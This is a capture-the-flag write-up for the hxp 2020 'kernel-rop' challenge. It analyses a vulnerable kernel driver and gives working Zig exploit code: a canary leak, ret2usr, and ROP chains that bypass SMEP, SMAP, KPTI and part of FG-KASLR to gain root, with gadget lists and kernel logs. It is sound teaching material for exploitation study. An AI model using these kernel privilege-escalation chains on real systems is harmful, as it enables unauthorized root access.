kernel-rop (hxp CTF 2020)
Description
Security is difficult, and defenses should be always taken with a grain of salt. Who would win? A buffer overflow or The Hottest Linux Defenses? Flag is in /dev/sda.
Files
Solution
We’re given the kernel image vmlinuz
and the initramfs.cpio.gz
; let’s see what we’re working with:
Bash
extract-vmlinux vmlinuz > vmlinux
file vmlinux
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), too many section (36140)
Bash
mkdir -p initramfs; cd initramfs
zcat ../initramfs.cpio.gz | cpio -id --quiet
ls
bin
etc
hackme.ko
init
root
sbin
usr
Bash
pwn checksec ./initramfs/hackme.ko 2>&1
[*] './initramfs/hackme.ko'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x0)
Stripped: No
Debuginfo: Yes
Let’s load hackme.ko
into IDA:
C
// IDA decompilation of the driver's read handler.
// Copies the on-stack array `tmp` into the global `hackme_buf`, then copies the
// caller-requested number of bytes from `hackme_buf` out to user space.
// The only length check is against 0x1000, while `tmp` is just 32 ints (128 bytes),
// so a request larger than 128 bytes hands back stack contents that follow `tmp`.
// Returns the requested size on success, or -14 (-EFAULT on Linux) if copy_to_user fails.
ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rbx
bool v6; // zf
ssize_t result; // rax
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v9; // [rsp+80h] [rbp-20h]
_fentry__(f, data);
// v4 is whatever is in rdx on entry; presumably the `size` argument (decompiler artifact).
v5 = v4;
// Value read from gs:0x28 and stored at rbp-0x20, i.e. 0x80 bytes after the start of tmp;
// the writeup treats this as the stack canary.
v9 = __readgsqword(0x28u);
// NOTE(review): the decompiler dropped the length argument; presumably it is v5.
_memcpy(hackme_buf, tmp);
if ( v5 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096, v5);
BUG();
}
_check_object_size(hackme_buf, v5, 1LL);
v6 = copy_to_user(data, hackme_buf, v5) == 0;
result = -14LL;
if ( v6 )
return v5;
return result;
}
// IDA decompilation of the driver's write handler.
// Copies up to 0x1000 user-supplied bytes into the global `hackme_buf`, then copies
// the same number of bytes from `hackme_buf` into the on-stack array `tmp`.
// `tmp` is only 32 ints (128 bytes), so any write longer than that overruns the
// stack frame (canary at rbp-0x20 first, then whatever follows it).
// Returns the number of bytes written, or -14 (-EFAULT on Linux) if copy_from_user fails.
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
unsigned __int64 v4; // rdx
ssize_t v5; // rbx
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v8; // [rsp+80h] [rbp-20h]
_fentry__(f, data, size, off);
// v4 is whatever is in rdx on entry; presumably the `size` argument (decompiler artifact).
v5 = v4;
// Value read from gs:0x28; the writeup treats this as the stack canary.
v8 = __readgsqword(0x28u);
// The bound is the size of hackme_buf's limit (0x1000), not the size of tmp.
if ( v4 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL);
BUG();
}
_check_object_size(hackme_buf, v4, 0LL);
if ( copy_from_user(hackme_buf, data, v5) )
return -14LL;
// The overflow: v5 may be up to 0x1000 but tmp holds 128 bytes.
_memcpy(tmp, hackme_buf, v5);
return v5;
}
Ok, a kernel module that will happily read/write in way more than it’s supposed to.
Let’s check that we do indeed smash the stack:
Zig
const std = @import("std");
/// Sanity check: read 40 bytes back from the driver, hex-dump them,
/// then issue a write to the device.
pub fn main() !void {
    const dev = try std.posix.open("/dev/hackme", .{ .ACCMODE = .RDWR }, 0o660);
    defer std.posix.close(dev);

    var scratch: [40]u8 = undefined;
    const got = try std.posix.read(dev, &scratch);
    std.debug.dumpHex(scratch[0..got]);

    _ = try std.posix.write(dev, "nil");
}
00007ffd2da7aa00 20 80 5F 07 80 88 FF FF E0 0F 00 00 00 00 00 00 ._.............
00007ffd2da7aa10 00 E6 F6 3F FF 6D FB F3 10 68 CA 06 80 88 FF FF ...?.m...h......
00007ffd2da7a9f0 68 FE 1B 00 00 C9 FF FF h.......
[ 1.539980] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: hackme_write+0xae/0xc0 [hackme]
[ 1.540395] CPU: 0 PID: 112 Comm: exploit Tainted: G O 5.9.0-rc6+ #10
[ 1.540600] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 1.540865] Call Trace:
[ 1.541476] dump_stack+0x74/0x92
[ 1.541560] panic+0xfe/0x2e3
[ 1.541641] ? hackme_write+0xae/0xc0 [hackme]
[ 1.541704] __stack_chk_fail+0x14/0x20
[ 1.541757] hackme_write+0xae/0xc0 [hackme]
[ 1.541840] ? ksys_write+0xa7/0xe0
[ 1.541910] ? exit_to_user_mode_prepare+0x31/0x180
[ 1.541975] ? __x64_sys_write+0x1a/0x20
[ 1.542036] ? do_syscall_64+0x37/0x80
[ 1.542111] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1.542666] Kernel Offset: disabled
[ 1.542945] Rebooting in 1 seconds..
Sanity check complete.
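Now let’s leak that pesky stack canary! According to IDA, tmp sits at the bottom of the frame (rbp-0xA0) with the canary right after it (rbp-0x20), so the canary occupies bytes 4 * 32 through 4 * 32 + 8 of whatever we read back; we therefore need to read 4 * 32 + 8 bytes.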
Pro tip: You can debug kernel modules under GDB by adding the offset of a particular function or instruction to the base address of said module, which can be found in /proc/modules.
Zig
// Excerpt from main(): `fd` is the already-opened /dev/hackme descriptor.
// Read the 32-int tmp array plus the 8 bytes that follow it.
var buf: [4*32+8]u8 = undefined;
_ = try std.posix.read(fd, &buf);
// Reverse the last 8 bytes in place so the hex string below prints most-significant byte first.
std.mem.reverse(u8, buf[buf.len-8..]);
std.debug.print("Stack canary is 0x{s}\n", .{std.fmt.bytesToHex(buf[buf.len-8..], .lower)});
Stack canary is 0x1c55bfc54ff0b200
Let’s check if we can do a simple ret2win:
Zig
const tmp_size = @sizeOf(i32) * 32;
/// Returns the first `len` bytes of `buf` in reverse order.
/// Used to turn a native (little-endian) integer's bytes into the order in
/// which they should be printed as a hex number.
/// `buf` must contain at least `len` bytes.
fn bigEndianify(comptime len: usize, buf: []const u8) [len]u8 {
    var reversed: [len]u8 = undefined;
    var i: usize = 0;
    while (i < len) : (i += 1) {
        reversed[i] = buf[len - 1 - i];
    }
    return reversed;
}
/// Flag polled by `spin`. Nothing in this listing sets it; presumably it is
/// flipped from a debugger to release the loop.
var __spinlock: bool = false;

/// Busy-waits until `__spinlock` is true.
inline fn spin() void {
    while (!__spinlock) {}
}
/// Leaks the stack canary through the driver's over-long read.
///
/// Reads `tmp_size + 8` bytes from `fd`: the driver's `tmp` array followed by
/// the 8-byte canary that sits directly after it.
/// Returns the canary as a native-endian u64.
/// Fails with `error.ShortRead` if the driver returned fewer bytes than asked
/// for, since the canary bytes would then be uninitialised garbage.
fn leakCanary(fd: std.posix.fd_t) !u64 {
    var buf: [tmp_size + 8]u8 = undefined;
    const got = try std.posix.read(fd, &buf);
    // read() may legally return less than requested; never interpret
    // bytes that were not actually filled in.
    if (got < buf.len) return error.ShortRead;
    return std.mem.bytesAsValue(u64, buf[tmp_size..]).*;
}
/// Userland landing pad for the first control-flow hijack test.
/// Executes a breakpoint instruction so that reaching this function is visible
/// as an int3 trap in the kernel log.
fn ret2win() void {
// I don't understand why, but this doesn't work (for an unprivileged shell)
// std.debug.print("[INFO] You won!!\n", .{});
// const argv = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
// switch (std.posix.execveZ(argv[0].?, argv[0..argv.len], &[_:null]?[*:0]const u8{})) {
// else => unreachable,
// }
asm volatile("int3; nop");
}
/// Minimal ret2usr test: leak the canary, then overflow hackme_write's frame so
/// that it returns to the userland function `ret2win`.
fn exploit(fd: std.posix.fd_t) !void {
// Raw bytes of ret2win's address, in native byte order, ready to be appended to the payload.
const ret = std.mem.asBytes(&@intFromPtr(&ret2win));
std.debug.print("[INFO] Address of ret2win is 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, @constCast(ret)), .lower)});
const canary = try leakCanary(fd);
std.debug.print("[INFO] Stack canary is 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, @constCast(std.mem.asBytes(&canary))), .lower)});
// Payload layout: filler for tmp | leaked canary | 24 bytes of filler | new return address.
const payload =
&[_]u8{0} ** tmp_size ++
std.mem.asBytes(&canary) ++
&[_]u8{0} ** (8 * 3) ++
ret;
_ = try std.posix.write(fd, payload);
}
[INFO] Address of ret2win is 0x00000000010251b0
[INFO] Stack canary is 0x5d0897751cd5fe00
[ 2.480911] int3: 0000 [#1] SMP NOPTI
[ 2.480961] CPU: 0 PID: 112 Comm: exploit Tainted: G O 5.9.0-rc6+ #10
[ 2.480966] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 2.480968] RIP: 0010:0x10251b1
[ 2.480970] Code: Bad RIP value.
[ 2.481005] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 2.481028] RAX: 00000000000000a8 RBX: 0000000000000000 RCX: 0000000000000000
[ 2.481031] RDX: 0000000000000008 RSI: ffffffffc00024e0 RDI: ffffc900001bfea8
[ 2.481034] RBP: 0000000000000000 R08: 00000000010251b0 R09: 00000000010251b0
[ 2.481037] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[ 2.481039] R13: ffffc900001bfef0 R14: 00007ffe920c3488 R15: ffff8880060c8600
[ 2.481042] FS: 0000000000000000(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 2.481045] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.481048] CR2: 000000000101fe20 CR3: 0000000006164000 CR4: 00000000000006f0
[ 2.481050] Call Trace:
[ 2.481052] ? ksys_write+0xa7/0xe0
[ 2.481054] ? exit_to_user_mode_prepare+0x31/0x180
[ 2.481056] ? __x64_sys_write+0x1a/0x20
[ 2.481058] ? do_syscall_64+0x37/0x80
[ 2.481061] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 2.481063] Modules linked in: hackme(O)
[ 2.485064] ---[ end trace 32df1ad37c4c8194 ]---
[ 2.485072] RIP: 0010:0x10251b1
[ 2.485075] Code: Bad RIP value.
[ 2.485078] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 2.485091] RAX: 00000000000000a8 RBX: 0000000000000000 RCX: 0000000000000000
[ 2.485093] RDX: 0000000000000008 RSI: ffffffffc00024e0 RDI: ffffc900001bfea8
[ 2.485096] RBP: 0000000000000000 R08: 00000000010251b0 R09: 00000000010251b0
[ 2.485098] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[ 2.485101] R13: ffffc900001bfef0 R14: 00007ffe920c3488 R15: ffff8880060c8600
[ 2.485103] FS: 0000000000000000(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 2.485106] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.485108] CR2: 000000000101fe20 CR3: 0000000006164000 CR4: 00000000000006f0
[ 2.485111] Kernel panic - not syncing: Fatal exception in interrupt
[ 2.485661] Kernel Offset: disabled
Nice.
ret2usr
For privilege escalation, we’ll create a new set of root credentials with prepare_kernel_cred(NULL) and overwrite the process’s existing cred struct with commit_creds(). [1]
Bash
cat /proc/kallsyms | grep -e 'prepare_kernel_cred' -e 'commit_creds'
ffffffff814c6410 T commit_creds
ffffffff814c67f0 T prepare_kernel_cred
ffffffff81f87d90 r __ksymtab_commit_creds
ffffffff81f8d4fc r __ksymtab_prepare_kernel_cred
ffffffff81fa0972 r __kstrtab_commit_creds
ffffffff81fa09b2 r __kstrtab_prepare_kernel_cred
ffffffff81fa4d42 r __kstrtabns_commit_creds
ffffffff81fa4d42 r __kstrtabns_prepare_kernel_cred
Additionally, we need to swap to userland before we pop a shell; this can be accomplished by saving the state of registers before interacting with the hackme
driver, then calling swapgs/iretq to context switch back to userland.
Zig
// Userland register state captured by saveState() and later used to build the
// iretq frame. Exported so the inline assembly can refer to them by symbol name.
export var user_cs: u64 = 0;
export var user_ss: u64 = 0;
export var user_rsp: u64 = 0;
export var user_rflags: u64 = 0;
/// Records the current cs, ss, rsp and rflags into the user_* globals.
/// Must be called before triggering the overflow. Note that the saved rsp is
/// the stack pointer as it is inside this function.
fn saveState() callconv(.C) void {
asm volatile (
\\.intel_syntax noprefix
\\mov user_cs, cs
\\mov user_ss, ss
\\mov user_rsp, rsp
\\pushf
\\pop qword ptr user_rflags
\\.att_syntax
);
}
/// ret2usr payload executed in kernel mode.
/// Calls 0xffffffff814c67f0 (prepare_kernel_cred per the kallsyms listing) with
/// rdi = 0, passes the result to 0xffffffff814c6410 (commit_creds), then does
/// swapgs and builds an iretq frame (ss, rsp, rflags, cs, rip) from the user_*
/// globals to return to userland.
/// `user_rip` is referenced by symbol name and is not declared in this snippet;
/// it must be an exported global defined elsewhere in the program.
/// The hard-coded addresses are only valid with KASLR disabled.
fn escalate() callconv(.C) void {
asm volatile (
\\.intel_syntax noprefix
\\xor rdi, rdi
\\movabs rcx, 0xffffffff814c67f0
\\call rcx
\\mov rdi, rax
\\movabs rcx, 0xffffffff814c6410
\\call rcx
\\swapgs
\\mov r15, user_ss
\\push r15
\\mov r15, user_rsp
\\push r15
\\mov r15, user_rflags
\\push r15
\\mov r15, user_cs
\\push r15
\\mov r15, user_rip
\\push r15
\\iretq
\\.att_syntax
);
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x4876ab567c920000
[INFO] You won!!
whoami: unknown uid 0
SMEP
Supervisor mode execution protection is kinda like the NX bit: when we’re in the kernel, userland pages are marked as non-executable. So instead of just calling ret2win we have to use ROP to pop a shell.
Bash
ropr --range=0xffffffff81000000-0xffffffff81b00000 -R '^swapgs|^iretq|^pop rdi; ret|^mov rdi, rax; (mov|ret)' vmlinux
0xffffffff81005245: mov rdi, rax; mov rdx, [rsp+8]; mov rax, [rsp]; add rsp, 0x18; jmp rdi;
0xffffffff8100a557: swapgs; rdgsbase rax; swapgs; pop rbp; ret;
0xffffffff8100a590: swapgs; wrgsbase rdi; swapgs; pop rbp; ret;
0xffffffff81200000: swapgs; sysretq;
0xffffffff812016d1: swapgs; sysret;
0xffffffff8140867f: mov rdi, rax; mov rdx, rcx; shl rdx, 6; add rdx, rcx; mov byte ptr [rax+rdx*4+0x104], 0; call qword ptr [0xffffffff82040220];
0xffffffff8146d4e4: swapgs; pop rbp; ret;
0xffffffff815e8db8: pop rdi; ret 0x4100;
0xffffffff81612872: mov rdi, rax; mov [rdx], r15; call qword ptr [0xffffffff82040220];
0xffffffff816bf203: mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
0xffffffff816df01e: mov rdi, rax; mov [r15+0x50], edx; call qword ptr [0xffffffff82040220];
0xffffffff8177020d: mov rdi, rax; mov rcx, [r10+0x148]; mov rdx, [r10+0x150]; call qword ptr [0xffffffff82040220];
0xffffffff817aaccb: mov rdi, rax; mov [r8+0x98], rsi; mov [rbp-0x78], rdx; call qword ptr [0xffffffff82040220];
0xffffffff818040d9: mov rdi, rax; mov rdx, [rdx+0x30]; mov r8, [rdx+0x40]; call qword ptr [0xffffffff82040220];
0xffffffff818f8495: mov rdi, rax; mov qword ptr [rdi], 1; pop rbp; ret;
0xffffffff8196258d: pop rdi; ret 0;
0xffffffff819c67c7: iretq;
0xffffffff819c6839: iretq;
0xffffffff819c68f6: iretq;
0xffffffff819ce301: pop rdi; ret 0xffff;
0xffffffff81a68c0d: pop rdi; ret;
0xffffffff81a77188: pop rdi; ret 0xb8ff;
0xffffffff81adf905: iretq;
Through trial and error I determined that gadgets roughly past 0xffffffff81b00000
were in a non-executable segment, so I restricted the search to reflect that.
Also, trying to use an allocator (including FixedBufferAllocator) to assist in constructing the payload led to confusing protection fault bugs, so beware of that.
Zig
// Gadget and symbol addresses for the SMEP bypass (KASLR disabled).
// Gadget addresses are taken from the ropr output; function addresses from /proc/kallsyms.
const POP_RDI: u64 = 0xffffffff8196258d; // pop rdi; ret 0
const MOV_RDI_RAX_POP_RBP: u64 = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret
const SWAPGS_POP_RBP: u64 = 0xffffffff8146d4e4; // swapgs; pop rbp; ret
const IRETQ: u64 = 0xffffffff819c67c7;
const PREPARE_KERNEL_CRED: u64 = 0xffffffff814c67f0;
const COMMIT_CREDS: u64 = 0xffffffff814c6410;
/// Writes the ROP chain that performs commit_creds(prepare_kernel_cred(0)) and
/// then returns to userland with swapgs + iretq.
/// `writer` must already contain the padding and canary; this only appends the
/// words starting at the overwritten return address.
/// Reads the globals user_rip, user_cs, user_rflags, user_rsp and user_ss.
fn ropchain(writer: anytype) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RDI,
0, // rdi = 0, the argument for prepare_kernel_cred
PREPARE_KERNEL_CRED,
MOV_RDI_RAX_POP_RBP, // rdi = returned cred pointer
0, // junk
COMMIT_CREDS,
SWAPGS_POP_RBP,
0, // junk
IRETQ,
// iretq frame, in the order the instruction pops it:
user_rip,
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x9866a26a8b9ba300
[INFO] You won!!
whoami: unknown uid 0
SMAP
With supervisor mode access protection, the kernel can not only not execute code in userspace, it cannot even read from or write to it. Because our ROP chain is contained in kernelspace, we are able to escalate privileges and context switch to userspace without reading from userland memory, so no issues here!
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x9a56f4945c848500
[INFO] You won!!
whoami: unknown uid 0
(One possible solve that works under SMEP but not SMAP involves stack pivoting to a page in userspace.)
KPTI
Kernel page-table isolation is a mitigation that results in different page tables being used when in user-mode or kernel-mode, and it was introduced to combat the Meltdown attack.
The previous exploit will not work because even though we context switch to userspace, we are still using kernel page tables and so ret2win is inaccessible. So in addition to context switching to userland, we also need to swap page tables.
This can be accomplished by a KPTI trampoline, which is very similar to our context switching gadget except that it also modifies the CR3
register to swap page tables.
Bash
cat /proc/kallsyms | grep -e 'swapgs_restore_regs_and_return_to_usermode'
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
Bash
objdump --start-address=0xffffffff81200f26 --stop-address=0xffffffff81200f46 -S vmlinux
objdump --start-address=0xffffffff81200f89 --stop-address=0xffffffff81200f97 -S vmlinux
objdump --start-address=0xffffffff8146d4e0 --stop-address=0xffffffff8146d4e9 -S vmlinux
objdump --start-address=0xffffffff81200f46 --stop-address=0xffffffff81200f4b -S vmlinux
objdump --start-address=0xffffffff81201067 --stop-address=0xffffffff81201082 -S vmlinux
objdump --start-address=0xffffffff81200fc7 --stop-address=0xffffffff81200fc9 -S vmlinux
vmlinux: file format elf64-x86-64
Disassembly of section .text:
ffffffff81000000 <_stext>:
ffffffff81200f26: 48 89 e7 movq %rsp, %rdi
ffffffff81200f29: 65 48 8b 24 25 04 60 00 00 movq %gs:0x6004, %rsp
ffffffff81200f32: ff 77 30 pushq 0x30(%rdi)
ffffffff81200f35: ff 77 28 pushq 0x28(%rdi)
ffffffff81200f38: ff 77 20 pushq 0x20(%rdi)
ffffffff81200f3b: ff 77 18 pushq 0x18(%rdi)
ffffffff81200f3e: ff 77 10 pushq 0x10(%rdi)
ffffffff81200f41: ff 37 pushq (%rdi)
ffffffff81200f43: 50 pushq %rax
ffffffff81200f44: eb 43 jmp 0xffffffff81200f89 <_stext+0x200f89>
ffffffff81000000 <_stext>:
ffffffff81200f89: 58 popq %rax
ffffffff81200f8a: 5f popq %rdi
ffffffff81200f8b: ff 15 f7 f0 e3 00 callq *0xe3f0f7(%rip) # 0xffffffff82040088
ffffffff81200f91: ff 25 e9 f0 e3 00 jmpq *0xe3f0e9(%rip) # 0xffffffff82040080
ffffffff8146d4e0 <.text.native_swapgs>:
ffffffff8146d4e0: 55 pushq %rbp
ffffffff8146d4e1: 48 89 e5 movq %rsp, %rbp
ffffffff8146d4e4: 0f 01 f8 swapgs
ffffffff8146d4e7: 5d popq %rbp
ffffffff8146d4e8: c3 retq
ffffffff81000000 <_stext>:
ffffffff81200f46: 0f 20 df movq %cr3, %rdi
ffffffff81200f49: eb 34 jmp 0xffffffff81200f7f <_stext+0x200f7f>
ffffffff81000000 <_stext>:
ffffffff81201067: 48 81 cf 00 10 00 00 orq $0x1000, %rdi # imm = 0x1000
ffffffff8120106e: 0f 22 df movq %rdi, %cr3
ffffffff81201071: 58 popq %rax
ffffffff81201072: ff 15 10 f0 e3 00 callq *0xe3f010(%rip) # 0xffffffff82040088
ffffffff81201078: 5f popq %rdi
ffffffff81201079: 48 89 c4 movq %rax, %rsp
ffffffff8120107c: 58 popq %rax
ffffffff8120107d: e9 45 ff ff ff jmp 0xffffffff81200fc7 <_stext+0x200fc7>
ffffffff81000000 <_stext>:
ffffffff81200fc7: 48 cf iretq
Zig
// Gadget and symbol addresses for the KPTI bypass (KASLR disabled).
const POP_RDI: u64 = 0xffffffff8196258d;
const MOV_RDI_RAX_POP_RBP: u64 = 0xffffffff816bf203;
// swapgs_restore_regs_and_return_to_usermode (0xffffffff81200f10) + 0x16, i.e. the
// `movq %rsp, %rdi` instruction shown in the disassembly.
const KPTI_TRAMPOLINE: u64 = 0xffffffff81200f26;
const PREPARE_KERNEL_CRED: u64 = 0xffffffff814c67f0;
const COMMIT_CREDS: u64 = 0xffffffff814c6410;
/// Writes the ROP chain that performs commit_creds(prepare_kernel_cred(0)) and
/// then returns to userland through the KPTI trampoline, which also switches
/// page tables via CR3 before its iretq.
/// Reads the globals user_rip, user_cs, user_rflags, user_rsp and user_ss.
fn ropchain(writer: anytype) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RDI,
0, // rdi = 0, the argument for prepare_kernel_cred
PREPARE_KERNEL_CRED,
MOV_RDI_RAX_POP_RBP, // rdi = returned cred pointer
0, // junk
COMMIT_CREDS,
KPTI_TRAMPOLINE,
// The trampoline copies [rsp+0] and [rsp+0x10..0x30] to its own stack;
// the first word ends up in rdi and the second is skipped.
0, // junk
0, // junk
user_rip,
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0xeabc83c7a6ad8500
[INFO] You won!!
whoami: unknown uid 0
Alternate solve: Signal Handlers
The SMEP+SMAP solve will segfault in userland when KPTI is enabled; instead of using a KPTI trampoline to switch to userland page tables, we can register a signal handler (in userland) for SIGSEGV
and the kernel will do the switch for us.
Zig
const std = @import("std");
export var user_rip: u64 = undefined;
/// Signal-handler form of the win function; the signal number is ignored.
/// Prints a marker and replaces the process image with /usr/bin/whoami using an
/// empty environment. execveZ only returns on failure, which is treated as
/// unreachable.
fn ret2win(_: i32) callconv(.C) void {
std.debug.print("[INFO] You won!!\n", .{});
const args = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
const env = [_:null]?[*:0]u8{};
switch (std.posix.execveZ("/usr/bin/whoami", args[0..args.len], env[0..env.len])) {
else => unreachable,
}
}
/// Installs `ret2win` as the SIGSEGV handler with an empty signal mask and no flags.
/// NOTE(review): whether std.posix.sigaction returns an error union depends on
/// the Zig version; if it does, the result must be handled with `try`/`catch`.
fn catch_sigsegv() void {
const sigact = std.posix.Sigaction{
.handler = .{ .handler = ret2win },
.mask = std.posix.empty_sigset,
.flags = 0,
};
std.posix.sigaction(std.posix.SIG.SEGV, &sigact, null);
}
/// Entry point for the signal-handler solve.
/// Order matters: the SIGSEGV handler and user_rip are set up and the register
/// state is saved before the device is touched, because the final flush never
/// returns normally.
pub fn main() !void {
catch_sigsegv();
user_rip = @intFromPtr(&ret2win);
saveState();
std.debug.print("[INFO] Saved state\n", .{});
const fd = try std.posix.open("/dev/hackme", .{ .ACCMODE = .RDWR }, 0o660);
defer std.posix.close(fd);
const canary = try leakCanary(fd);
std.debug.print("[INFO] Canary: 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, @constCast(std.mem.asBytes(&canary))), .lower)});
// Build the whole payload in a buffered writer so it reaches the driver on flush
// rather than piece by piece.
const file = (std.fs.File{ .handle = fd }).writer();
var bw = std.io.bufferedWriter(file);
const writer = bw.writer();
// Payload layout: filler for tmp | canary | 24 bytes of filler | ROP chain.
try writer.writeByteNTimes(0, tmp_size);
try writer.writeAll(std.mem.asBytes(&canary));
try writer.writeByteNTimes(0, (8*3));
try ropchain(writer);
// The write issued by flush hijacks control flow inside the kernel.
try bw.flush();
unreachable;
}
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x10f9df0cd1e27500
[INFO] You won!!
whoami: unknown uid 0
KASLR
Time for the final challenge: fine-grained kernel address space layout randomization (FG-KASLR).
Unlike regular (K)ASLR, a single leak is not enough to find the addresses of all symbols—we must get more creative to find the addresses of certain parts of our payload.
Fortunately not all symbols are affected by the fine-grained (or function granular?) part of KASLR:
Bash
cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
ffffffff95200000 T startup_64
ffffffff95200030 T secondary_startup_64
ffffffff952001f0 T __startup_64
ffffffff95400f10 T swapgs_restore_regs_and_return_to_usermode
ffffffff95987a80 T commit_creds
ffffffff95b00e00 T prepare_kernel_cred
ffffffff96187d90 r __ksymtab_commit_creds
ffffffff9618d4fc r __ksymtab_prepare_kernel_cred
ffffffff961a0972 r __kstrtab_commit_creds
ffffffff961a09b2 r __kstrtab_prepare_kernel_cred
ffffffff961a4d42 r __kstrtabns_prepare_kernel_cred
ffffffff961a4d42 r __kstrtabns_commit_creds
Bash
# reboot and run again
cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
ffffffff90000000 T startup_64
ffffffff90000030 T secondary_startup_64
ffffffff900001f0 T __startup_64
ffffffff90200f10 T swapgs_restore_regs_and_return_to_usermode
ffffffff90741cf0 T commit_creds
ffffffff908b7880 T prepare_kernel_cred
ffffffff90f87d90 r __ksymtab_commit_creds
ffffffff90f8d4fc r __ksymtab_prepare_kernel_cred
ffffffff90fa0972 r __kstrtab_commit_creds
ffffffff90fa09b2 r __kstrtab_prepare_kernel_cred
ffffffff90fa4d42 r __kstrtabns_prepare_kernel_cred
ffffffff90fa4d42 r __kstrtabns_commit_creds
Python
# /proc/kallsyms entries for the same symbols, captured on two separate boots.
#
# These are (address, symbol) pairs rather than dicts keyed by address: several
# symbols can share one address (both __kstrtabns_* entries do), and a dict
# keyed by address silently keeps only the last of them.
ksyms1 = [
    (0xffffffff95200000, "startup_64"),
    (0xffffffff95200030, "secondary_startup_64"),
    (0xffffffff952001f0, "__startup_64"),
    (0xffffffff95400f10, "swapgs_restore_regs_and_return_to_usermode"),
    (0xffffffff95987a80, "commit_creds"),
    (0xffffffff95b00e00, "prepare_kernel_cred"),
    (0xffffffff96187d90, "__ksymtab_commit_creds"),
    (0xffffffff9618d4fc, "__ksymtab_prepare_kernel_cred"),
    (0xffffffff961a0972, "__kstrtab_commit_creds"),
    (0xffffffff961a09b2, "__kstrtab_prepare_kernel_cred"),
    (0xffffffff961a4d42, "__kstrtabns_prepare_kernel_cred"),
    (0xffffffff961a4d42, "__kstrtabns_commit_creds"),
]
ksyms2 = [
    (0xffffffff90000000, "startup_64"),
    (0xffffffff90000030, "secondary_startup_64"),
    (0xffffffff900001f0, "__startup_64"),
    (0xffffffff90200f10, "swapgs_restore_regs_and_return_to_usermode"),
    (0xffffffff90741cf0, "commit_creds"),
    (0xffffffff908b7880, "prepare_kernel_cred"),
    (0xffffffff90f87d90, "__ksymtab_commit_creds"),
    (0xffffffff90f8d4fc, "__ksymtab_prepare_kernel_cred"),
    (0xffffffff90fa0972, "__kstrtab_commit_creds"),
    (0xffffffff90fa09b2, "__kstrtab_prepare_kernel_cred"),
    (0xffffffff90fa4d42, "__kstrtabns_prepare_kernel_cred"),
    (0xffffffff90fa4d42, "__kstrtabns_commit_creds"),
]

# Look symbols up by name so the comparison does not depend on both listings
# being in the same order.
_addr1 = {sym: addr for addr, sym in ksyms1}
_addr2 = {sym: addr for addr, sym in ksyms2}

# startup_64 is the reference point: its shift between boots is the plain KASLR slide.
diff = _addr1["startup_64"] - _addr2["startup_64"]

# A symbol is unaffected by FG-KASLR if it moved by exactly the same amount.
invariants = [
    sym
    for _, sym in ksyms1
    if sym != "startup_64"
    and sym in _addr2
    and _addr1[sym] - _addr2[sym] == diff
]
print(f"{invariants} left invariant under FG-KASLR")
['secondary_startup_64', '__startup_64', 'swapgs_restore_regs_and_return_to_usermode', '__ksymtab_commit_creds', '__ksymtab_prepare_kernel_cred', '__kstrtab_commit_creds', '__kstrtab_prepare_kernel_cred', '__kstrtabns_commit_creds'] left invariant under FG-KASLR
prepare_kernel_cred and commit_creds are affected by FG-KASLR, but the KPTI trampoline, __ksymtab_commit_creds and __ksymtab_prepare_kernel_cred are fine.
What is __ksymtab? There needs to be some way for kernel modules to be able to see symbols exported by the kernel or other kernel modules, so ksymtab is a struct (which has an address that is a fixed offset from the kernel base address) that stores information about a symbol, such as the address offset relative to the corresponding ksymtab struct. [2] So if we get the address of __ksymtab_commit_creds and then add __ksymtab_commit_creds.value_offset [3] to it, we get the address of commit_creds.
With that in mind, let’s find gadgets to build our payload (restricting our search to the beginning of the kernel which, as we observed earlier, is not affected by FG-KASLR, just regular KASLR).
Bash
